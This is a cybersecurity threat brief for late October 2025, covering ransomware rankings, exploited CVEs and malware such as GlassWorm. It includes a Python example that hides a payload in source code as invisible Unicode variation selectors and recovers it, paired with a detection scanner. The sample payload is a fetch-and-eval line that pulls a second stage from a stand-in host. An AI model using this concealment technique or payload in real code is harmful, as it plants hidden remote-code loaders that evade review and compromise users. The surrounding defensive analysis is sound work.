Byer-Nichols Threat Brief Cybersecurity Data For October 16-31 2025
Executive Summary
The recent theft of source code from F5 has put the more than a quarter of a million F5 BIG-IP instances whose management interfaces are reachable from the Internet at risk of remote attack. Regardless of what the stolen F5 source code ultimately enables, this incident underscores the point that the management interfaces of network infrastructure devices should never be exposed to the Internet. In terms of victim locations, we see a notable change in this period, with Australia joining the top 5.
Report Links
Download Threat Brief For October 16-31 2025
Byer-Nichols Threat Brief Podcast 10-31-2025
Ransomware Actors
| Ransomware | Share of victims | Rank last period | Rank two periods ago |
|---|---|---|---|
| Qilin | 26.28% | 1 | 1 |
| Akira | 10.71% | 4 | 2 |
| Sinobi | 5.87% | 3 | 23 |
| CL0P | 4.34% | 39 | N/A |
| PLAY | 4.08% | 3 | 6 |
After posting only 5 victims since May, and none since early July, Clop has made a dramatic return to the ransomware scene with 18 victims in roughly 3 weeks. Clop is noted for its use of multi-level extortion techniques and is believed to have extorted over $500 million in ransom payments. Clop has used large-scale phishing campaigns and now tends to focus on pure extortion with "encryption-less ransomware", in which data is stolen and held for ransom without being encrypted. This is an increasingly common trend amongst ransomware actors as more potential victims defend against crypto-ransomware with well-tested backups, leaving data exposure as the remaining lever.
Victim Sector
| Sector | Share of victims | Rank last period | Rank movement |
|---|---|---|---|
| manufacturing | 15.82% | 1 | no change |
| financial-services | 15.05% | 4 | 4 -> 2 |
| construction | 13.27% | 5 | 5 -> 3 |
| retail | 12.76% | 2 | 2 -> 4 |
| technology | 11.73% | 3 | 3 -> 5 |
Victim Location
| Country | Share of victims | Rank last period | Rank movement |
|---|---|---|---|
| USA | 54.85% | 1 | Unchanged |
| Canada | 6.12% | 3 | 3 -> 2 |
| Germany | 3.06% | 5 | 5 -> 3 |
| France | 2.55% | 2 | 2 -> 4 |
| Australia | 2.55% | New | New |
Victim Org Size
| Org size | Share this period | Share last period | Share two periods ago |
|---|---|---|---|
| Small Business (500 or less) | 77.30% | 70.07% | 81.47% |
| Mid-Market (501-5000) | 16.07% | 16.79% | 13.29% |
| Large Enterprise (5000+) | 6.63% | 13.14% | 5.24% |
Trending Adversaries
- APT27
- APT31
- MuddyWater
- Star Blizzard
- Tick
- UNC5142
Amongst trending adversaries, UNC5142, a financially motivated threat actor, is particularly notable for its use of techniques that abuse public blockchains to host or retrieve stages of its tooling, which gives its infrastructure greater resiliency and makes take-downs more difficult. Another concerning actor is Star Blizzard, which has links to Russian intelligence and is involved in spear-phishing Western think tanks and defense firms for espionage purposes.
Trending & Actively Exploited Vulnerabilities
| CVE | Vendor | Product |
|---|---|---|
| CVE-2022-48503 | Apple | Multiple Products |
| CVE-2025-24893 | XWiki | Platform |
| CVE-2025-2746 | Kentico | Xperience CMS |
| CVE-2025-2747 | Kentico | Xperience CMS |
| CVE-2025-33073 | Microsoft | Windows |
| CVE-2025-41244 | Broadcom | VMware Aria Operations and VMware Tools |
| CVE-2025-54236 | Adobe | Commerce and Magento |
| CVE-2025-54253 | Adobe | Experience Manager (AEM) Forms |
| CVE-2025-59287 | Microsoft | Windows |
| CVE-2025-61884 | Oracle | E-Business Suite |
While we are seeing a high number of actively exploited vulnerabilities in this period, one that particularly warrants attention is CVE-2025-59287. The severity of this vulnerability in Windows Server Update Services (WSUS) led Microsoft to issue an out-of-band update to address it. The concerning aspect of this vulnerability is that it allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges on the update server, a system that by design distributes software to every other machine in the estate. Organisations running the WSUS role should apply the out-of-band update immediately and confirm that WSUS is not reachable from the Internet.
Trending Malware
| Malware | Malware Details |
|---|---|
| CLEARSHOT | A campaign by UNC5142 has compromised vulnerable WordPress sites and used them to host a multistage loader called CLEARSHOT. This loader then fetches a second stage from a public blockchain, improving its resiliency and making takedowns harder. Finally, a ClickFix social engineering lure is used to get the victim to run commands that download malware onto the endpoint. |
| GlassWorm | GlassWorm is the first worm that spreads through VS Code extensions in the OpenVSX store. It hides its malicious code with invisible characters so humans and tools miss it, and it controls infected machines through the Solana blockchain so the control network is extremely hard to remove. |
| MaybeRobot and NoRobot | Google's Threat Intelligence Group (GTIG) has spotted new activity from the Russian government-backed hacking group known as COLDRIVER (also called UNC4057, Star Blizzard, or Callisto). After its LOSTKEYS malware was exposed in May 2025, the group quickly began using new malware families named NOROBOT, YESROBOT, and MAYBEROBOT. GTIG reports that COLDRIVER is now developing malware and carrying out attacks faster and more aggressively than before. |
| Odyssey Stealer | Odyssey is a macOS infostealer that has raised concern because samples have been seen that are code-signed with a valid Apple Developer ID. This matters because signed and notarized binaries can be downloaded and run on Macs without being blocked or flagged by built-in security controls such as Gatekeeper, so the signature removes the warning that would otherwise give a user pause. |
| RADTHIEF | RADTHIEF, also known as Rhadamanthys, is one of the InfoStealers being used by UNC5142 in its campaign to abuse blockchain smart contracts as a way to distribute malware. |
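The GlassWorm entry above notes that the worm hides its code behind invisible characters so that both reviewers and tooling miss it. The following is an added example, not code from the original brief or from any published GlassWorm analysis: it shows one way a payload can be smuggled into otherwise ordinary JavaScript source using Unicode variation selectors (an assumed encoding for this example, mapping each byte to one of the 256 variation-selector code points), and the scanner a reviewer or CI gate would run to surface such runs before an extension is trusted. The code-point ranges in `SUSPECT_RANGES` are a starting list chosen for this example, not a published indicator set.

```python
import unicodedata

# Code-point ranges that render as nothing (or silently alter rendering) and so
# should never appear unexplained in source code. Chosen for this example.
SUSPECT_RANGES = [
    (0x200B, 0x200F),    # zero-width space/non-joiner/joiner, LRM, RLM
    (0x202A, 0x202E),    # bidi embedding and override controls
    (0x2060, 0x2064),    # word joiner, invisible times/separator/plus
    (0x2066, 0x2069),    # bidi isolate controls
    (0xFE00, 0xFE0F),    # variation selectors 1-16
    (0xFEFF, 0xFEFF),    # zero-width no-break space
    (0xE0000, 0xE007F),  # tag characters
    (0xE0100, 0xE01EF),  # variation selectors 17-256
]


def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in SUSPECT_RANGES):
        return True
    # Any other "format" character (Unicode category Cf) is invisible as well.
    return unicodedata.category(ch) == "Cf"


# --- attacker side: how a payload can ride inside visible-looking source ---

def _byte_to_vs(b: int) -> str:
    """Assumed encoding: bytes 0-15 -> U+FE00..FE0F, bytes 16-255 -> U+E0100..E01EF."""
    return chr(0xFE00 + b) if b < 16 else chr(0xE0100 + (b - 16))


def _vs_to_byte(ch: str):
    cp = ord(ch)
    if 0xFE00 <= cp <= 0xFE0F:
        return cp - 0xFE00
    if 0xE0100 <= cp <= 0xE01EF:
        return cp - 0xE0100 + 16
    return None


def hide_payload(cover: str, payload: bytes) -> str:
    """Append the payload to `cover` as variation selectors; an editor renders only `cover`."""
    return cover + "".join(_byte_to_vs(b) for b in payload)


def recover_payload(text: str) -> bytes:
    """What a loader stub would do at runtime: collect the selectors back into bytes."""
    return bytes(b for b in (_vs_to_byte(ch) for ch in text) if b is not None)


# --- defender side: what review tooling should do before trusting the file ---

def strip_invisible(text: str) -> str:
    return "".join(ch for ch in text if not is_invisible(ch))


def scan_source(text: str):
    """Return (line, column, code point, name) for every invisible character found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if is_invisible(ch):
                findings.append((lineno, col, f"U+{ord(ch):04X}",
                                 unicodedata.name(ch, "<unnamed>")))
    return findings


def summarize(text: str) -> dict:
    """Count of findings per code point, the summary a CI gate would print before failing."""
    counts = {}
    for _, _, cp, _ in scan_source(text):
        counts[cp] = counts.get(cp, 0) + 1
    return counts


if __name__ == "__main__":
    # Constructed sample: a harmless-looking extension file carrying a hidden second stage.
    cover = "const activate = () => { console.log('extension ready'); };\n"
    payload = b"fetch('https://example.invalid/stage2').then(r => r.text()).then(eval);"
    poisoned = hide_payload(cover, payload)
    assert strip_invisible(poisoned) == cover   # identical on screen, not on disk
    for finding in scan_source(poisoned)[:3]:
        print(finding)
    print(f"{len(scan_source(poisoned))} invisible code points;",
          f"summary={summarize(poisoned)}; recovered={recover_payload(poisoned)!r}")
```

The point of `strip_invisible` is that the poisoned file and the clean file are indistinguishable once invisible code points are removed, which is exactly why a human diff review does not catch this; the check has to run on the raw bytes, and a CI gate that fails on any non-empty `summarize()` result is the cheapest place to put it.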
Top News
- 266,000+ F5 BIG-IP instances exposed to remote attacks, 75,000+ WatchGuard security devices vulnerable to critical RCE
- Prosper data breach impacts 17.6 million accounts
- Europol dismantles SIM box operation renting numbers for cybercrime
- Experian fined $3.2 million for mass-collecting personal data
- AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more
- Hackers exploit 34 zero-days on first day of Pwn2Own Ireland, 56 on day two
- Cursor, Windsurf IDEs riddled with 94+ n-day Chromium vulnerabilities
- LinkedIn phishing targets finance execs with fake board invites
Contributors
Written by Jeremy Nichols, former Director Of The Global Threat Intelligence Center
Executive Summaries & Adversary Bios by Geoff Rehmet, Cybersecurity Expert
Produced & Distributed By Byer Co Cybersecurity Marketing Division (aka Phish Tank Digital)